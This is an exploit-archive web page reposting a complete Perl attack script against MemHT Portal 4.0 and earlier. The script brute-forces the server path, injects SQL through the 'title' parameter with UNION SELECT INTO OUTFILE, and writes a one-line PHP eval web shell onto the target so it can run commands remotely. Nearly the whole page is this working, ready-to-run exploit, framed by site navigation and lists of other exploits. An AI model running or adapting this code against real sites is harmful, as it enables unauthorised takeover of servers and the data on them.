首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MemHT Portal <= 4.0 Remote Code Execution Exploit
来源:ax330d [doggy] gmail [dot] com 作者:Ams 发布时间:2008-11-10  
#!/usr/bin/perl

=about

MemHT Portal <= 4.0 Perl exploit

AUTHOR:
Discovered and written by Ams
ax330d [doggy] gmail [dot] com

DESCRIPTION:
Here we are able to make SQL-injection due to weak filtering.
So, look at inc/inc_header.php lines ~ 74, where hides code
$checktitle = (isset($_GET['title'])) ? urldecode(inCode($_GET['title'])) : "" ;
We can easily bypass this check. And look again at lines
~ 67 in inc/inc_fnctions.php, - this is not that best solution.

This exploit provides simple shell.

REQUIREMENTS:
MySQL should be able to write to file
Know full server path to portal

=cut

use strict;
use warnings;
use IO::Socket;

print "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  MemHT portal <= 4.0 Perl exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
";

my $expl_url  = shift or &usage;
my $serv_path = shift || '-b';
my $def_shell = '/uploads/file/files.php';
# Simple concept shell
my $shell = '%253C%253Fphp%2520@eval%2528%2524_GET%255Bcmd%255D%2529%253B';

my @paths = qw(
/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
/home/www  /home/httpd/vhosts
/usr/local/apache/htdocs
/www/htdocs
);

@paths = ( $serv_path ) unless $serv_path eq '-b';

exploit( $expl_url );

sub exploit {

# Defining vars.
$_ = shift;
$_ .= '/' unless substr($_, -1) eq '/';
print "\n\tExploiting:\t $_\n";

my($packet, $rcvd);
my($prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};

# Trying to get /lang/english.php to get server path
$packet  = "POST $path/lang/english.php HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
$rcvd = send_pckt($host, $packet, 1);

die "\n\tUnable to connect to $host!\n\n" unless $rcvd;

if( $rcvd =~ /Undefined variable:/ ) {
@paths = ($rcvd =~ m#\s+in\s+(.*?)${path}lang/english.php#);
print "\n\tFound path:\t $paths[-1]\n";
} else {
print "\n\tStarting bruteforce...\n";
}

# Some bruteforce here
for $serv_path ( @paths ) {

# Poisoned request
my $injection
= "page=articles&id=-1&op=readArticle&title=one%2527%2520UNION+SELECT+1%2C2%2C%2527$shell%2527+INTO+OUTFILE+%2527$serv_path$path$def_shell%2527--\%2520";

print "\n\tTesting:\t $serv_path$path$def_shell ...\n";
$packet  = "GET $path/index.php?$injection HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";

send_pckt($host, $packet, 1) or die "\n\tUnable to connect to http://$host!\n\n";
}

# Checking for shell presence
$packet  = "HEAD $path$def_shell HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";

$rcvd = send_pckt($host, $packet, 1);
if( ! $rcvd) {
print "\n\tUnable to connect to $host\n\n";
exit;
}

if( $rcvd =~ /200\s+OK/ ) {
print "\n\tExploited:\t http://$host$path$def_shell\n\n";
} else {
print "\n\tExploiting failed.\n\n";
}

}

sub send_pckt() {

my $dat;
my ($host, $packet, $ret) = @_;
my $socket = IO::Socket::INET->new(
Proto    => 'tcp',
PeerAddr => $host,
PeerPort => 80
);
if( ! $socket) {
return 0;
} else {

print $socket $packet;
if( $ret ) {
local $/;
$dat = <$socket>;
}
close $socket;
return $dat;
}
}

sub usage {
print "\n\tUsage:\t$0 http://site.com [-b|full server path]

By default exlpoit checks /lang/english.php for errors to get real path.
If path could not be found exploit will bruteforce it ( or if used -b or none path is specified ).

Example:\t$0 http://localhost/ /var/www/htdocs
$0 http://localhost/ -b
$0 http://localhost/\n\n";
exit;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GE Proficy Real Time Informati
·Mambo Component n-form (form_i
·VLC Media Player < 0.9.6 .RT S
·e-Vision CMS <= 2.0.2 Multiple
·Simple Machines Forum <= 1.1.6
·Adobe Reader util.printf() Jav
·PHPX 3.5.16 (news_id) Remote S
·PhpCms2007 sp6 SQL injection 0
·ooVoo 1.7.1.35 (URL Protocol)
·Simple Machines Forum (SMF) 1.
·smcFanControl 2.1.2 Multiple B
·TR News <= 2.1 (login.php) Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved